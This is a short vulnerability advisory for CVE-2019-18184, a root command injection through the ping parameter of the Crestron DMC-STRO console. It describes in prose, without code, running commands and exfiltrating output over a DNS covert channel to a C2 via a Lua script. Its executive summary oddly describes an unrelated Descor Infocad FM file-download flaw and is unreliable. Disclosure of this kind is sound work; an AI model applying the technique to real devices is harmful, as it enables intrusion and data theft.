• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • Crestron DMC-STRO Remote Root RCE

    27-11-2019

    CVEID: CVE-2019-18184
    Affected Products and Versions: CRESTRON DMC-STRO firmware 1.0

    Executive Summary
    A critical vulnerability was discovered in Descor Infocad FM v2016.1.5.0 through v3.1.0.0,
    the unauthenticated web service GlobalReaderWCF allows the download of arbitrary files from local disks and remote SMB shares via an unsanitized user-controlled field.
    Depending on the version, configuration files with clear-text passwords can be retrieved (version < 3.1.0.0),
    also depending on the host configuration and whether or not the machine is joined to a domain, ntlm relay attacks may be possible.

    Additional Information
    the CTP Console allows, through Bash Command Substitution on the ‘ping’ command parameters, to execute commands on the device on behalf of the root user.

    RCE DMC-STRO in ping parameters

    Through the usage of a DNS Covert Channel it was possible to enumerate the binaries available under /bin and /usr/bin. Enumerating the content of such directories it was possible to find out that the Lua interpreter was available. Therefore I wrote down a Lua script that executes commands on the target, encrypts the result in base64 chunks, and send them back to the C2 through DNS Queries.

    Execute Commands and exfiltrate data through DNS Covert Channel

    From the C2 it is then possible to rechain the base64 chunks and decode the payload back to obtain the result of the executed command

    Decode Base64 encoded payload

    Remediation:
    We suggest to block such connections with a firewall rule. Furthermore update the DMC STRO firmware

    Discoverer:
    Gabrio Tognozzi <g.tognozzi@quantumleap.it>; <gtognozzi@deloitte.it>

    Timeline:
    19/09/2019 Vulnerability was reported to the vendor
    07/10/2019 Vulnerability was confirmed to be on the queue to fix
    27/11/2019 Vulnerability details published

    Latest posts by Gabrio Tognozzi (see all)